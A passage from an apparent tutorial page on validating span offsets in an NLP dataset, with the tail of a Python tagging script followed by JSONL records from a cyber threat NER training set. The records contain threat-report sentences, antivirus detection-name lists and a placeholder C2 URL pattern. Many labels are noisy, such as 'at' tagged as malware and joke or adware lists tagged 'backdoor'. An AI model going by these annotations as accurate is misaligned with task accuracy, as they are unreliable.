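    cannot flip tags in the middle of the enclosing entity."""
    text = record["text"]
    spans = sorted(iter_spans(record), key=lambda s: (s[2], -(s[3] - s[2])))
    tagged = []
    for m in re.finditer(r"\S+", text):
        tag = "O"
        for label, _, start, end in spans:
            if start <= m.start() and m.end() <= end:
                tag = ("B-" if m.start() == start else "I-") + label
                break
        tagged.append((m.group(), tag))
    return tagged


def detection_names(record: dict) -> List[str]:
    """For the 'also known as' records, return the vendor detection names; [] for any other record."""
    text = record["text"]
    if not text.startswith(AKA_PREFIX):
        return []
    return text[len(AKA_PREFIX):].split()


if __name__ == "__main__":
    for rec_id, problems in audit(SAMPLE_JSONL).items():
        print(rec_id)
        for p in problems:
            print("  ", p)
    print(to_bio(parse_records(SAMPLE_JSONL)[0]))
```

Run the audit before any retokenisation or cleanup of the text and again after: a record whose text was changed without its offsets being recomputed shows up exactly like the constructed fifth line, with a surface that is off by a character. Note that the validator only proves the offsets point at the stated surface; it cannot tell you whether the label itself is sensible, so a span like the "MALWARE: at" annotation later on this page passes while still being a labelling error.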
{"text": "A backdoor also known as: Trojan.Win32.Cult.fvly W32/Cult.B@mm W32.HLLW.Cult@mm Win32/Cult.E Email-Worm.Win32.Cult.b Win32.Cult.B@mm I-Worm.Cult.B Worm.Win32.Cult.B Win32.HLLW.SpyBot I-Worm/Cult.b Worm.Cult.b.kcloud Worm:Win32/Cult.D@mm I-Worm.Win32.Cult.16418 Win32/Cult.worm.16418 Win32.Cult.B@mm W32/Cult.B@mm Worm.Cult Net-Worm.Cult Win32/Cult.B Worm.Cults.b Email-Worm.Win32.Cult W32/Cult.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006131", "source": "cyner2_train"}} {"text": "Last week, an Endgame researcher was analyzing spam emails for indications of emergent malicious activity.", "spans": {"ORGANIZATION: Endgame researcher": [[14, 32]]}, "info": {"id": "cyner2_train_006132", "source": "cyner2_train"}} {"text": "Symantec is currently investigating reports of yet another new attack in the Middle East involving the destructive disk-wiping malware used by the Shamoon group W32.Disttrack, W32.Disttrack.B.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "MALWARE: destructive disk-wiping malware": [[103, 134]], "THREAT_ACTOR: Shamoon group": [[147, 160]]}, "info": {"id": "cyner2_train_006133", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnlineGamesXTUG.Worm Trojan-PSW.Win32.QQShou!O Trojan/PSW.QQShou.aqt Trojan.Win32.QQShou.evyqv TROJ_AGKT.SMUS6 Trojan.Qqshou-23 Trojan-PSW.Win32.QQShou.pfp Trojan.PWS.QQShou!WQNr+ttAX9g Trojan.Win32.PSWQQShou.80480[h] Troj.PSW32.W.QQShou.aqt!c Trojan.QQShou.Win32.1230 TROJ_AGKT.SMUS6 BehavesLike.Win32.Autorun.lc Trojan/PSW.QQShou.adz W32/VB.NII!tr Trojan[PSW]/Win32.QQShou Trojan.Graftor.D33E1 Trojan/Win32.QQShou PWS:Win32/QQpass.DW Win32/QQPass.NVO TrojanPSW.QQShou Win32.Trojan-qqpass.Qqrob.Hwwq Trojan-PWS.Qqshou Trojan.Win32.VB.NII", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006134", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Rootkit.9056.H Win32.Trojan.WisdomEyes.16070401.9500.9999 Hacktool.Rootkit 
Win32/Rookuz.S Trojan.Win32.Hmir.bczend Trojan.NtRootKit.13456 Downloader.Hmir.Win32.3829 Backdoor.Winnt Trojan[Downloader]/Win32.Hmir Troj.GameThief.W32.OnLineGames.kZeW Backdoor:WinNT/Blazgel.A Trojan/Win32.Rootkit.R24603 TrojanDownloader.Hmir Win32/RootKit.Rootkit.03f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006135", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.BD3E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006136", "source": "cyner2_train"}} {"text": "Symantec first began looking into this threat in the fall of 2013.", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": {"id": "cyner2_train_006137", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.A.Downloader.39936.EG Trojan.DownLoad2.31494 W32/Trojan.BMBV-5898 TR/Vodvit.A.10 Trojan:Win32/Vodvit.A Trojan.Graftor.D79FB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006139", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.71D4 Win32.Trojan.Kryptik.hj W32/Trojan.YMZM-8551 Trojan.Win32.SpyEyes.cxesvi Trojan.PWS.Papras.244 BehavesLike.Win32.DocumentCrypt.dc Trojan[Spy]/Win32.SpyEyes Trojan.Kazy.D5A6E2 TrojanDropper:Win32/Vawtrak.A Trojan/Win32.Reveton.R107579 TrojanPSW.Tepfer Backdoor.Andromeda Win32.Trojan.Atraps.Pbfq TrojanSpy.SpyEyes!jq5iqgzT3B4 Trojan-Spy.Zbot W32/Kryptik.EWVT!tr Win32/Trojan.73f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006141", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.BackdoorWabot.Trojan Backdoor.Win32.Wabot!O Trojan.Wabot.A8 Trojan/Delf.nrf Win32.Backdoor.Wabot.a W32.Wabot Win32/DCMgreen.A BKDR_WABOT.SMIA Win.Trojan.Wabot-6113548-0 Backdoor.Win32.Wabot.a Trojan.Win32.Wabot.dmukv Backdoor.Win32.Wabot.157619 Backdoor.W32.Wabot.tn6b Trojan.Win32.Wabot.a Backdoor.Win32.Wabot.A Trojan.MulDrop6.64369 Backdoor.Wabot.Win32.1 BKDR_WABOT.SMIA 
BehavesLike.Win32.Wabot.wc P2P-Worm.Win32.Delf Backdoor/Wabot.z Trojan[Backdoor]/Win32.Wabot.a TrojanSpy:MSIL/Omaneat.B Trojan.ShellIni.E7E294 Backdoor.Win32.Wabot.a Worm/Win32.IRCBot.R3689 Backdoor.Wabot Backdoor.Wabot I-Worm.Delf.NRF Win32/Delf.NRF Backdoor.Wabot!jai+hnpgbwI W32/Luiha.M!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006142", "source": "cyner2_train"}} {"text": "Starting on May 11, 2017, Flashpoint analysts observed several large spam campaigns originating from the Necurs botnet that aim to dupe recipients into opening malicious attachments that infect their computers with Jaff ransomware.", "spans": {"ORGANIZATION: Flashpoint": [[26, 36]], "THREAT_ACTOR: spam campaigns": [[69, 83]], "MALWARE: the Necurs botnet": [[101, 118]], "SYSTEM: computers": [[200, 209]], "MALWARE: Jaff ransomware.": [[215, 231]]}, "info": {"id": "cyner2_train_006144", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Celofot.D Trojan/W32.Sasfis.93184.B Trojan.Win32.Sasfis!O Trojan.Sasfis TROJ_DELF.SMH Win32.Trojan.WisdomEyes.16070401.9500.9986 W32/Risk.WXEM-5531 Backdoor.Bifrose Trojan.Sasfis Win32/Sasfis.NUH Win.Trojan.Sasfis-42 Backdoor.Celofot.D Trojan.Win32.Sasfis.aobz Backdoor.Celofot.D Trojan.Win32.Sasfis.ikchn Trojan.Win32.A.Sasfis.93696.C Troj.W32.Smardf.lrGo Backdoor.Celofot.D Trojan.DownLoader4.42747 BehavesLike.Win32.SpywareLyndra.nc Trojan-Dropper.Delf W32/MalwareS.BHQS Trojan/Sasfis.koz Trojan/Win32.Sasfis.aobz Backdoor:Win32/Nitvea.A Backdoor.Celofot.D Trojan.Win32.Sasfis.aobz Trojan/Win32.Sasfis.R20535 Backdoor.Celofot.D Backdoor.Celofot.D Win32.Trojan.Sasfis.Pijo Trojan.Sasfis!nQm4iaN0os8 W32/Sasfis.LB!tr Win32/Trojan.6e1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006145", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Win32.Backdoor.Prorat.e W32/Prorat.BNXP-3134 Backdoor.Prorat Win32/Prorat.19.P Win.Trojan.Delf-1540 
Trojan.Win32.Tiny.baadu Backdoor.W32.Prorat!c BackDoor.ProRat.19 BehavesLike.Win32.Adware.tc Backdoor.Win32.Prorat W32/ProratX.ANJ BDS/Lurpen.rts W32/BDoor.AVW!dam Backdoor/Win32.Prorat.R111443 Backdoor.Prorat Bck/Prorat.HT Backdoor.Prorat!o+pRlXhwebo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006146", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnlinegameJTPX.Trojan Virus.Win32.Sality!O Troj.GameThief.W32.WOW.hre!c Win32.Trojan.WisdomEyes.16070401.9500.9997 Infostealer.Gampass Win32/Wowpa.HS TROJ_FAM_0001989.TOMA Win.Trojan.Delf-1669 Trojan.Win32.PSWWow.22440.B TrojWare.Win32.Trojan.Banker.~d08 Trojan.PWS.Wow.1283 Trojan.WOW.Win32.2972 TROJ_FAM_0001989.TOMA BehavesLike.Win32.Sality.lc W32/Trojan.EOQM-5227 Trojan/PSW.Moshou.ars Trojan[GameThief]/Win32.WOW Win32.Troj.PswWowT.lk.kcloud TrojanDropper:Win32/Dozmot.B Trojan/Win32.OnlineGameHack.C54025 BScope.Trojan.OnlineGames.0825 Win32/PSW.WOW.DZI Win32.Trojan.Heurinject.Lnxt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006147", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke.Movingmouse Joke/W32.BadJoke.21504 Joke.Movingmouse Joke.MoveMouse Win.Joke.MovingMouse-1 Hoax.Win32.BadJoke.MovingMouse.a Joke.Movingmouse Riskware.Win32.MovingMouse.hrfx Hoax.BadJoke.21504.A Win32.Trojan-psw.Badjoke.Suno Joke.Win32.BadJoke.MovingMouse.~FCD Joke.Movingmouse Trojan.MulDrop.28720 Aplicacion/MovingMouse.a not-a-virus:BadJoke.Win32.MovingMouse.a W32/Joke.RZZA-1623 not-virus:Joke.Win32.MovingMouse HackTool[Hoax]/Win32.MovingMouse Joke.Movingmouse Hoax.W32.BadJoke.MovingMouse.a!c Hoax.Win32.BadJoke.MovingMouse.a Joke.Movingmouse Unwanted/Win32.Movingmouse.R123022 Joke.Movingmouse Win32/Hoax.MovingMouse.B Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006148", "source": "cyner2_train"}} {"text": "A backdoor also known as: W64/Application.KFTW-0763 Trojan.Win64.AdAnti.exbcmq 
ADWARE/AdAnti.nqwib Adware.ChinAd Trj/CI.A Win32/Trojan.7be", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006149", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.MSIL.SpyGate.wsr Trojan.Win32.Disfa.dqmqly BehavesLike.Win32.Trojan.cc GrayWare/MSIL.Injector.AWA Trojan.Zusy.D28231 Trj/CI.A Trojan.Win32.Fsysna Win32/Trojan.7c5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006154", "source": "cyner2_train"}} {"text": "Consumers in English-speaking countries, in particular the US and UK, are most at risk, since this is where the largest numbers of targeted banks are located.", "spans": {"ORGANIZATION: Consumers": [[0, 9]], "MALWARE: at": [[79, 81]], "ORGANIZATION: banks": [[140, 145]]}, "info": {"id": "cyner2_train_006156", "source": "cyner2_train"}} {"text": "Earlier this month, we spotted a phishing campaign that led victims to unknowingly download the Banker malware.", "spans": {"THREAT_ACTOR: phishing campaign": [[33, 50]], "MALWARE: Banker malware.": [[96, 111]]}, "info": {"id": "cyner2_train_006157", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Skeeyah.S5 Downloader.Chindo.Win32.162 Trojan.Adware.Graftor.D374DC not-a-virus:Downloader.Win32.Chindo.ap Trojan.Win32.Chindo.dumnyn Variant.Mikey.mvHB Adware.Chindo.12 PUA.RiskWare.Chindo RiskWare[Downloader]/Win32.Chindo.ap TrojanDownloader:Win32/Codumwis.B not-a-virus:Downloader.Win32.Chindo.ap BScope.Malware-Cryptor.Ngrbot Win32/RiskWare.Chindo.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006158", "source": "cyner2_train"}} {"text": "Odatv is a secular news organization founded in 2007 with a reputation for being critical of Turkey's government and the Gülen Movement.", "spans": {"ORGANIZATION: Odatv": [[0, 5]], "ORGANIZATION: secular news organization": [[11, 36]], "ORGANIZATION: Turkey's government": [[93, 112]], "ORGANIZATION: 
the Gülen Movement.": [[117, 136]]}, "info": {"id": "cyner2_train_006159", "source": "cyner2_train"}} {"text": "This threat can download other malware and unwanted software onto your PC.", "spans": {"MALWARE: threat": [[5, 11]], "MALWARE: malware": [[31, 38]], "SYSTEM: software": [[52, 60]], "SYSTEM: PC.": [[71, 74]]}, "info": {"id": "cyner2_train_006161", "source": "cyner2_train"}} {"text": "These URLs are all in the form of “ http : // $ C2. $ SERVER. $ IP/api/ ? id= $ NUM ” .", "spans": {}, "info": {"id": "cyner2_train_006163", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Bladabindi.FC.3722 Trojan.Zusy.D3D182 Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.lt MSIL/Small.CM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006164", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Yakes.8842 Trojan/CsNowDown.c Win32.Trojan.WisdomEyes.16070401.9500.9736 Downloader.Darkmegi Win.Trojan.Darkcpn-1 Trojan.Win32.Yakes.ktpl Trojan.Win32.Gamania.dridjs Trojan.PWS.Gamania.34539 BehavesLike.Win32.Backdoor.ct Trojan.Graftor.DCAF7 Trojan.Win32.Yakes.ktpl Trojan:WinNT/Waltrodock.A Downloader/Win32.Darkmegi.C1839200 Trj/CI.A W32/CsNowDown.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006165", "source": "cyner2_train"}} {"text": "Upon investigation we have determined the malware payload to be DELoader, which downloads a Zeus variant banking trojan upon execution.", "spans": {"MALWARE: malware payload": [[42, 57]], "MALWARE: DELoader,": [[64, 73]], "MALWARE: Zeus variant banking trojan": [[92, 119]]}, "info": {"id": "cyner2_train_006168", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Lexfir.A TrojanAPT.Lexfir.A6 Trojan.Lexfir.A TSPY_DERUSBI.SMJ1 Win32.Trojan.WisdomEyes.16070401.9500.9979 Infostealer.Derusbi TSPY_DERUSBI.SMJ1 Win.Trojan.Derusbi-42 Trojan.Lexfir.A Backdoor.Win32.Winnti.jr Trojan.Lexfir.A Trojan.Lexfir.A Trojan.Lexfir.A 
DLOADER.PWS.Trojan W32/Trojan.ZNCA-7493 TR/PSW.Lexfir.A.3 Trojan.Lexfir.A Backdoor.Win32.Winnti.jr PWS:Win32/Lexfir.A Backdoor/Win32.Etso.R30303 Win32.Backdoor.Winnti.Lfzs Trojan.Derusbi!jrrDP0rufRk Trojan-Spy.Win32.Derusbi W32/DERUSBI.C!tr Win32/Trojan.PSW.186", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006169", "source": "cyner2_train"}} {"text": "The unidentified financial group targeted regional and global banks with offices in the Middle East.", "spans": {"THREAT_ACTOR: The unidentified financial group": [[0, 32]], "ORGANIZATION: regional": [[42, 50]], "ORGANIZATION: global banks": [[55, 67]], "ORGANIZATION: offices": [[73, 80]]}, "info": {"id": "cyner2_train_006170", "source": "cyner2_train"}} {"text": "Security Service of Ukraine SBU indicated that Russian spies had implanted malicious softwares in the State Grid which caused power plants shut down unexpectedly.", "spans": {"ORGANIZATION: Security Service of Ukraine SBU": [[0, 31]], "THREAT_ACTOR: Russian spies": [[47, 60]], "MALWARE: malicious softwares": [[75, 94]], "ORGANIZATION: the State Grid": [[98, 112]], "ORGANIZATION: power plants": [[126, 138]]}, "info": {"id": "cyner2_train_006171", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.LarmogasD.Trojan Dropped:Backdoor.Hupigon.211672 W32.Jadtre.B4 Trojan.Black.Win32.3180 Trojan/Dropper.Delf.dlv Dropped:Backdoor.Hupigon.211672 W32/Risk.UMVG-4201 TROJ_JADTRE.SMM Win.Spyware.66802-2 TScope.Malware-Cryptor.SB W32.Parite.lf96 TrojWare.Win32.PSW.OnLineGames.~LLD Trojan.PWS.Legmir.3153 BehavesLike.Win32.Gate.nh W32/Dropper.ANYI Trojan/KillAV.bbj TR/Drop.Delfdru.O Win32.PSWTroj.OnLineGames.kcloud Backdoor.Hupigon.D33AD8 Dropped:Backdoor.Hupigon.211672 Dropper/Win32.Microjoin.R1379 Dropped:Backdoor.Hupigon.211672 Dropped:Backdoor.Hupigon.211672 Trj/CI.A Trojan.DR.Delfdru!ayAD7it/9FQ Win32/Trojan.Dropper.cad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006174", "source": 
"cyner2_train"}} {"text": "APT19 used three different techniques to attempt to compromise targets.", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "ORGANIZATION: targets.": [[63, 71]]}, "info": {"id": "cyner2_train_006175", "source": "cyner2_train"}} {"text": "A backdoor also known as: AIT:Trojan.Autoit.CAQ AIT:Trojan.Autoit.CAQ Win32.Trojan.WisdomEyes.16070401.9500.9949 AIT:Trojan.Autoit.CAQ Trojan-Banker.Win32.AutoIt.zl AIT:Trojan.Autoit.CAQ Trojan.DownLoader23.53524 Trojan/Banker.AutoIt.bu TrojanSpy:Win32/Aneatop.A Trojan-Banker.Win32.AutoIt.zl Win32.Trojan-banker.Autoit.Suny Win32/Trojan.5f1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006176", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.WscmgrA.Trojan Trojan-PSW.Win32.Delf!O Trojan/PSW.Delf.abx Win32.Trojan.WisdomEyes.16070401.9500.9700 W32/Autorun.MSPP-2235 W32.SillyFDC Win32/Retecha.A WORM_DELF.NAN Win.Trojan.Delf-3449 Trojan-PSW.Win32.Delf.abx Trojan.Win32.Delf.brmlqc Trojan.Win32.Autorun.382020 Win32.Trojan-qqpass.Qqrob.Sxyo Trojan.PWS.Sadas Trojan.Delf.Win32.3468 WORM_DELF.NAN W32/Autorun.O Trojan/PSW.GamePass.yqg TR/PSW.Delf.abx.3 Worm:Win32/Hamtacker.A Trojan-PSW.Win32.Delf.abx Worm/Win32.AutoRun.R76556 Worm.Brontok Trojan.Delf.ABX Win32/PSW.Delf.ABX Hacktool.Dialuppass.A not-a-virus:PSWTool.Win32.Dialupass.an W32/Autorun.PG.worm Win32/Trojan.PSW.8bb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006178", "source": "cyner2_train"}} {"text": "Yet perhaps most notably, BianLian has shifted the main focus of their attacks away from ransoming encrypted files to focus more on data-leak extortion as a means to extract payments from victims.", "spans": {"THREAT_ACTOR: BianLian": [[26, 34]]}, "info": {"id": "cyner2_train_006183", "source": "cyner2_train"}} {"text": "Visa also published a list of Internet addresses that may have been involved in the Oracle breach and are thought to be closely tied to an Eastern European organized 
cybercrime gang.", "spans": {"ORGANIZATION: Visa": [[0, 4]], "THREAT_ACTOR: Eastern European organized cybercrime gang.": [[139, 182]]}, "info": {"id": "cyner2_train_006184", "source": "cyner2_train"}} {"text": "Destructive malware used by unknown computer network exploitation CNE operators has been identified.", "spans": {"MALWARE: Destructive malware": [[0, 19]], "VULNERABILITY: computer network exploitation CNE": [[36, 69]]}, "info": {"id": "cyner2_train_006186", "source": "cyner2_train"}} {"text": "The earliest instance where a cyber attack was attributed to the OilRig campaign was in late 2015.", "spans": {"THREAT_ACTOR: the OilRig campaign": [[61, 80]]}, "info": {"id": "cyner2_train_006187", "source": "cyner2_train"}} {"text": "If the geolocation points to Brazil, then another malicious file is downloaded.", "spans": {}, "info": {"id": "cyner2_train_006192", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.BitcoinMiner Win32.Trojan.WisdomEyes.16070401.9500.9983 Downloader.MisleadApp not-a-virus:RiskTool.Win32.BitCoinMiner.iqlc Trojan.Win32.Z.Svcminer.27648 RiskTool.BitCoinMiner.gvg TR/Downloader.knzhj RiskWare[RiskTool]/Win32.BitCoinMiner TrojanDownloader:Win32/SvcMiner.A!bit not-a-virus:RiskTool.Win32.BitCoinMiner.iqlc Trojan/Win32.Mepaow.C87266 Trj/GdSda.A Trojan.CoinMiner", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006196", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.RadmasAM.Trojan Worm/W32.Updater.65536.B Virus.Win32.Sality!O Win32.Worm.Pepex.b W32.Virut.CF Win32/Tnega.AQRF WORM_DIPASIK.SM Win.Worm.Updater-4 Email-Worm.Win32.Updater.n Hoax.W32.ArchSMS.m5oU Win32.HLLM.Updater.5 WORM_DIPASIK.SM Email-Worm.Win32.Atak Worm/Updater.e Worm[Email]/Win32.Updater Worm:Win32/Networm.A Email-Worm.Win32.Updater.n Trojan/Win32.Kykymber.R128813 Worm.Updater Win32/Pepex.I Trojan.Win32.Snake.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006199", "source": 
"cyner2_train"}} {"text": "Several days ago, researchers at FireEye attributed a recent phishing campaign to FIN7, a campaign in which cybercriminals delivered malicious Microsoft Office documents to users, deploying both Cobalt Strike and a VBS-based backdoor on infected workstations.", "spans": {"ORGANIZATION: researchers": [[18, 29]], "ORGANIZATION: FireEye": [[33, 40]], "THREAT_ACTOR: phishing campaign": [[61, 78]], "THREAT_ACTOR: FIN7,": [[82, 87]], "THREAT_ACTOR: campaign": [[90, 98]], "THREAT_ACTOR: cybercriminals": [[108, 122]], "MALWARE: malicious Microsoft Office documents": [[133, 169]], "MALWARE: Cobalt Strike": [[195, 208]], "MALWARE: VBS-based backdoor": [[215, 233]], "SYSTEM: infected workstations.": [[237, 259]]}, "info": {"id": "cyner2_train_006202", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9974 Trojan.Win32.ArchSMS.cwxrht Hoax.MSIL.gn Trojan:MSIL/Blinerarch.AU Trj/CI.A Msil.Risk.Hoax.Wure Trojan.ArchSMS!IMpJTYjIG18 Hoax.MSIL Win32/Trojan.Dropper.411", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006203", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Systex.A Trojan.Inject1.7920 Win32.Troj.Undef.kcloud VirTool:Win32/Obfuscator.XZ Rootkit.Xytets HeurEngine.Vmpbad Trojan.Spy.Texy!4898 Trojan.Win32.Spy Trj/Thed.W", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006204", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D255EA Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BackDoor.Miniduke.3 BehavesLike.Win32.RansomWannaCry.tz Trojan.Win32.Bayrob TR/Crypt.ZPACK.88814 Trojan[Backdoor]/Win32.CosmicDuke Win32.Hack.CosmicDuke.h.kcloud Trojan:Win32/Bandiu.A Backdoor.CosmicDuke Backdoor.CosmicDuke! 
W32/CosmicDuke.F!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006206", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Pesin.Win32.2 Trojan.Heur.E41DEE Win32.Trojan.WisdomEyes.16070401.9500.9997 Win32/Pesin.C Virus.Win32.HLLW.Delf.b Virus.Win32.HLLW.gjjl Trojan.PWS.Mob Trojan/HLLP.s W32/Banker.TOA!tr Worm:Win32/Pesin.C Virus.Win32.HLLW.Delf.b Trojan.Worm.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006207", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.35FE WORM_METSYS.SMI W32/Trojan.ZLO Win32/ProRat.AL WORM_METSYS.SMI Trojan.Ratibe W32/Trojan.JJUN-8278 Trojan:Win32/Metsys.A HEUR/Fakon.mwf W32/MediaTest.A.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006208", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.RansomGimemoE.Trojan Trojan-Ransom.Win32.Gimemo!O Trojan.Dofoil.A Trojan.Gimemo.Win32.2687 Trojan/Injector.sxm Win32.Trojan.Injector.ec W32.Pilleuz Win32/Loktrom.FR TROJ_RANSOM.SM3 Win.Trojan.Injector-603 Trojan-Ransom.Win32.Gimemo.vhu Trojan.Win32.Gimemo.tfgni Trojan.Win32.A.Gimemo.83968 Trojan.Packed.22718 TROJ_RANSOM.SM3 BehavesLike.Win32.ZBot.dc Trojan/Gimemo.cmk Trojan[Ransom]/Win32.Gimemo Ransom:Win32/Loktrom.A Trojan.Zusy.D2A53 Win.Adware.Websearch.moge Trojan-Ransom.Win32.Gimemo.vhu Trojan/Win32.Injector.R30428 BScope.Trojan-Injector.2151 Trojan.Injector!ZShGusAMkc8 Trojan-Ransom.Win32.Gimemo W32/Zbot.YW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006209", "source": "cyner2_train"}} {"text": "In the past two years, two campaigns of Sakula activity stand out as being particularly significant – the French Aerospace Campaign and the Ironman Campaign.", "spans": {"THREAT_ACTOR: two campaigns of": [[23, 39]], "MALWARE: Sakula": [[40, 46]], "ORGANIZATION: the French Aerospace Campaign": [[102, 131]], "ORGANIZATION: the Ironman Campaign.": [[136, 157]]}, 
"info": {"id": "cyner2_train_006211", "source": "cyner2_train"}} {"text": "After the files are encrypted filenames are appended with .rokku", "spans": {}, "info": {"id": "cyner2_train_006212", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.VB Trojan.Midie.DA596 Win32.Trojan.VB.gx W32/Trojan.ZVBM-4484 Win32/FakeRecycled.A WORM_VB.SMF Win.Trojan.VB-684 Trojan.Win32.VB.aqt Trojan.DownLoad3.64248 WORM_VB.SMF BehavesLike.Win32.Dropper.wc Trojan.Atros6 W32/Trojan.XUP Trojan.Qhost.pw TR/VB.AQT Trojan/Win32.VB Worm:Win32/Fakerecy.A Trojan.Win32.VB.aqt Trojan/Win32.Tiggre.R216587 SScope.Trojan.VBRA.7311 Trj/CI.A Worm.Autorun.DU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006213", "source": "cyner2_train"}} {"text": "As a part of this campaign, we also observed attacks on Russian-speaking financial analysts working at global financial firms and covering telecom corporations in Russia, likely a result of collateral damage caused by the attackers targeting tactics.", "spans": {"THREAT_ACTOR: campaign,": [[18, 27]], "ORGANIZATION: Russian-speaking financial analysts": [[56, 91]], "ORGANIZATION: global financial firms": [[103, 125]], "ORGANIZATION: telecom corporations": [[139, 159]], "THREAT_ACTOR: attackers": [[222, 231]]}, "info": {"id": "cyner2_train_006214", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Jorik.IRCbot!O Trojan.Jorik Trojan.Jorik.Win32.190644 Troj.W32.Jorik.Ircbot!c Trojan/IRCBot.nhr Win32.Trojan.WisdomEyes.16070401.9500.9992 W32.IRCBot Trojan.Win32.Jorik.IRCbot.wja Trojan.Win32.Jorik.dgdeqb BackDoor.IRC.Sdbot.17833 BehavesLike.Win32.Trojan.nh Trojan.Win32.Jorik Trojan/Jorik.gmen Trojan/Win32.IRCbot Trojan.Win32.Jorik.IRCbot.wja Trojan:Win32/Squida.A Worm/Win32.IRCBot.R123038 Trojan.IRCbot Win32.Trojan.Jorik.Ahef Win32/Trojan.053", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006215", "source": "cyner2_train"}} {"text": "The newest variant, TeslaCrypt 
2.0, uses the same encryption algorithm; however, the keys and other configuration data are stored in the Windows Registry instead of a file on the local disk as in previous versions.", "spans": {"MALWARE: TeslaCrypt 2.0,": [[20, 35]]}, "info": {"id": "cyner2_train_006217", "source": "cyner2_train"}} {"text": "During our investigation, we were able to discover a number of domains all part of the same infrastructure with custom skimmers for several Magento stores.", "spans": {"SYSTEM: same infrastructure": [[87, 106]], "MALWARE: skimmers for": [[119, 131]], "ORGANIZATION: Magento stores.": [[140, 155]]}, "info": {"id": "cyner2_train_006218", "source": "cyner2_train"}} {"text": "The Trojan may ask the user to pay a ransom in order to have their files decrypted.", "spans": {"MALWARE: Trojan": [[4, 10]], "ORGANIZATION: user": [[23, 27]]}, "info": {"id": "cyner2_train_006220", "source": "cyner2_train"}} {"text": "While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or solutions as the Duke group apparently calls them.", "spans": {"MALWARE: SeaDuke": [[6, 13]], "MALWARE: malware": [[105, 112]], "ORGANIZATION: Duke group": [[145, 155]]}, "info": {"id": "cyner2_train_006221", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Strictor.D1A6AB BehavesLike.Win32.DlHelper.tc Trojan:Win32/Merca.A Trj/GdSda.A Trojan-Spy.Banker W32/Delf.OKU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 